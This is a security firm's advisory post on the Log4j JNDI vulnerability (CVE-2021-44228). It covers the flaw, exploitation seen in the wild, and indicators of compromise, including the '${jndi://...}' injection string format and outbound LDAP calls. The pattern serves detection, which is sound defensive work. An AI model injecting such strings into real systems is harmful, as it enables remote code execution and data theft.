Fri, Dec 17, 2021
**12/20/2021 Update: Apache has released Log4j 2.17.1, which resolves a Denial of Service and potential Remote Code Execution vulnerability captured in CVE-2021-45105. We recommend organizations update to 2.17.1 as soon as possible, with additional valid recommendations listed below.**
A critical vulnerability has been recently discovered in the Apache Log4j Java logging library (CVE-2021-44228), a library used in many client and server applications. The Log4j library is commonly included in Java based software including multiple Apache frameworks such as Struts2, Solr, Druid and Fink. The library provides enhanced logging functionality for Java applications and is widely used.
This vulnerability is the result of an Apache system design error involving the Java Naming and Directory Interface (JNDI). JNDI is a part of how applications speak to each other, and in the case of this vulnerability, has left the application server utilizing the library vulnerable. JNDI handing in log4j (and all applications that use it) was susceptible to a variable injection attack, which can be used to trick the application into leaking sensitive information, or executing attacker provided code. As a result of this vulnerability, threat actors can ultimately exfiltrate sensitive information or execute malicious payloads on vulnerable victim application servers, potentially allowing complete access to your network.
Kroll alerted clients to the threat on Friday, December 10 and shortly thereafter Kroll was engaged by several impacted customers and is continuing to be engaged on new related work as of this article’s posting. Our Kroll Responder team has been continuing to refine telemetry searches to identify potentially impacted instances of log4j in association with external connections to identify applications and hosts that need the most urgent attention.
Our team has observed that scanning of an organization’s perimeter networks to identify and prioritize issues requiring immediate focus and time is a crucial initial step. It is also important to review available alerts from any existing security products, most of which have already implemented rules to help identify log4j exposures, as well as reviewing and responding to log4j scanning events.
One initial indicator of compromise (IOC) would be specially crafted incoming requests to a victim network. These requests contain special strings in the format “${jndi://[...]}” and may be obfuscated to avoid detection. This could indicate that a network is being scouted by potential threat actors or through their mass scanning automations to hone in on vulnerable applications or networks, and that proactive solutions should be engaged to ensure that a network is not subject to attack or that sensitive data is not being queried and leaving the network.
A more critical indicator of compromise would be detection of any outbound LDAP requests from the network to unknown IPs. This should be immediate cause for concern, as the most likely explanation is that your network has been affected by the Log4j vulnerability.
At this stage, we’ve instituted detections across a variety of integrations, from endpoints, firewalls and webservers running on Linux, Windows and macOs.
Kroll has observed that this vulnerability is actively being exploited in the wild, and is being used to install botnets, crypto mining malware and in the initial stages of intrusions. Our investigations are largely identifying that by the time Kroll is being engaged, the Threat Actor has already moved into stages three (3) or four (4) of the Kroll Intrusion Lifecycle and information is still being gained and reviewed to determine separate threat actor’s and their ultimate goals, whether Ransomware, Financial Fraud, or Data Exfiltration (stages 7 and 8).
Detecting intrusions in the early phases before they move to steps 5 or later.
The infosec community has rallied around CVE-2021-44228 due to its wide-ranging impact. Below is a small list of resources compiled by security researchers and agencies worldwide:
Kroll recommends organizations take the following steps:
Even though CISA Director Jen Easterly told industry leaders in a phone briefing Monday that the Log4j vulnerability “is one of the most serious I’ve seen in my entire career, if not the most serious.” and thousands of information security professionals have had very little sleep over the past few days, it’s important to keep a level head. Yes, patch as soon as possible, but also consider existing detections and your ability to respond should something suspicious happen.
For internal teams burdened with a host of other priorities and a remote workforce, support from dedicated experts who have the frontline expertise, resources and technical skills to assess your exposure can greatly reduce your risk profile. Talk to a Kroll expert today via our 24x7 hotlines or contact form.
Contributors to this article: Josh Karanouh-Schuler, Keith Wojcieszek
Incident response, digital forensics, breach notification, managed detection services, penetration testing, cyber assessments and advisory.
Stop cyberattacks. Kroll Responder managed detection and response is fueled by seasoned IR experts and frontline threat intelligence to deliver unrivaled response.
Kroll is the largest global IR provider with experienced responders who can handle the entire security incident lifecycle.
Kroll’s ransomware preparedness assessment helps your organization avoid ransomware attacks by examining 14 crucial security areas and attack vectors.
Kroll delivers more than a typical incident response retainer—secure a true cyber risk retainer with elite digital forensics and incident response capabilities and maximum flexibility for proactive and notification services.